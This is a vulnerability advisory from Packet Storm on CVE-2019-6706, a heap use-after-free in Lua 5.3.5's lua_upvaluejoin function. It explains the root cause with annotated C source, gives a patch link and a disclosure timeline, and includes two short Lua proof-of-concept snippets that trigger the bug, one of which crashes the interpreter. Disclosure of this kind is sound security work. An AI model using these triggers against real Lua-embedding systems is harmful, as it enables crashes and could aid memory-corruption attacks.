Lua 5.3.5 Use-After-Free

2019-01-2500:00:00

Fady Mohamed Osman

packetstormsecurity.com

0.047 Low

EPSS

Percentile

91.8%

JSON

`# Exploit Title: Lua 5.3.5  
# Exploit Author: Fady Mohamed Osman (https://twitter.com/fady_othman)  
# Exploit-db : http://www.exploit-db.com/author/?a=2986  
# Blog : https://blog.fadyothman.com/  
# Date: Jan. 10th 2019  
# Vendor Homepage: https://www.lua.org/  
# Software Link: https://www.lua.org/ftp/lua-5.3.5.tar.gz  
# Version: 5.3.5  
# CVE ID: CVE-2019-6706  
  
During a fuzz session using "AFL", I found a heap use after free in lua  
5.3.5, after analysis of the crash I found the root cause of the  
vulnerability, here's the details.  
  
The function `lua_upvaluejoin` in file lapi.c at line 1287 suffers from a  
use after free bug when supplied the same function for parameter f1 and f2  
and the same upvalue index, additionally I found that the bug is only  
triggered when the upvalue is closed, this happens because the  
`luaC_upvdeccount` function found in file lgc.c at line 678 will decrement  
the refcount and then free the upvalue if the refcount is zero and if the  
upvalue is closed.  
See the comments below for more explanation.  
--------------  
LUA_API void lua_upvaluejoin (lua_State *L, int fidx1, int n1,  
int fidx2, int n2) {  
LClosure *f1;  
UpVal **up1 = getupvalref(L, fidx1, n1, &f1);  
UpVal **up2 = getupvalref(L, fidx2, n2, NULL);  
luaC_upvdeccount(L, *up1); //Will delete up1  
*up1 = *up2; //up1 is up2 because it's the same upvalue and now it's  
freed.  
(*up1)->refcount++; //up1 is freed, yet it's used here.  
if (upisopen(*up1)) (*up1)->u.open.touched = 1;  
luaC_upvalbarrier(L, *up1);  
}  
--------------  
  
- To trigger the bug simply use a lua program like this (this one will  
crash):  
--  
f=load(function() end)  
interesting={}  
interesting[0]=string.rep("A",512)  
debug.upvaluejoin(f,1,f,1)  
---  
  
- Another program that will not crash (unless you compile with  
-fsanitize=address):  
---  
function w()  
local x = {}  
f = function() print(x) end  
end  
w()  
debug.upvaluejoin(f,2,f,2)  
---  
  
If you want a fix you can use the patch provided here:  
http://lua.2524044.n2.nabble.com/CVE-2019-6706-use-after-free-in-lua-upvaluejoin-function-tc7685575.html  
  
  
Timeline:  
- Jan 10th 2019 : Vulnerability discovered and reported to lua mailing list.  
- Jan 23rd 2019 : CVE Identifier obtained.  
- Jan 25th 2019 : Fix is suggested by MatAj Cepl.  
  
Refrences:  
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6706  
https://security-tracker.debian.org/tracker/CVE-2019-6706  
https://vuldb.com/?id.130228  
  
`